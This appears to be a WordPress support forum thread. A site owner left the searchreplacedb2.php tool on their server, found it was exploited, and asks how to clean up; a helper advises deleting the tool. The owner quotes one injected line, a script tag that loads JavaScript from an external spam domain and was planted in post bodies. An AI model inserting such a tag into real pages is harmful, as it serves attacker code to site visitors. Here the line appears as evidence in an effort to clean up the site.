Forgot to remove searchreaplacedb2.php: what can I do now?

  • Resolved appleaday

    (@appleaday)


    7 years, 7 months ago

    Yes, I was that fool, I neglected the importance of removing that file as soon as possible in order not to forget it where I dropped it. I also noticed in the past logs some POST requests, so someone must have take advantage of that vulnerability. I read “How to Clean a Hacked WordPress Site using Wordfence” and everything that might be related to the problem. But so far no step-by-step guide to mend for the error on my own. I read “If You Use This Script, You’ve Probably Already Been Hacked” where a possible substitution is showed… but is that the only way things might have been changed? Should I necessarily resort to Premium Wordfence Support? That way will anyone eventually certify a sanitization and possibly reveal to me how he acted?

    Thanks in advance!

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter appleaday

    (@appleaday)

    UPDATE: I found several additions in the bodies of the posts, like the one below, coming before an anchor tag.

    <script src=’https://traffictrade.life/scripts.js&#8217; type=’text/javascript’></script>

    I used the same searchreplacedb2.php with the name changed to purge the tables from that rubbish and eventually delete that copy. Now I wonder what else I should check. Possibly any <script>…</script> in the bodies fo the posts?
    What else?

    Thanks in advance!

    Hi,
    After making sure you have cleaned your website’s database from these spam entries using this tool, It’s highly recommended to delete it immediately, after reading your first post I thought you forgot where exactly you have this file on the server, but after reading the second one, I realized you have used it recently to clean the database, so for sure you know where is the file by now?

    Thanks.

    Thread Starter appleaday

    (@appleaday)

    I’m afraid I didn’t get for sure the question, anyway I try to answer.
    I can tell for sure where the file is and where there isn’t, since I never thought of giving it a completely unrelated name, except for the last time I used it, and I’m pretty sure I removed each copy of the script from any virtual host in use.

    In the meantime I also gave a look at the other tables (“posts” involves articles and static pages, I saw..) but I couldn’t find any table where something could be profitably be inserted with a “search and replace” operation. For the moment I can assume the aim of the intrusion was just spamming pages and articles with redirections (the mentioned <script>). But I wonder what I paid Wordfence intervention could do in my stead.

    Thanks!

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Forgot to remove searchreaplacedb2.php: what can I do now?’ is closed to new replies.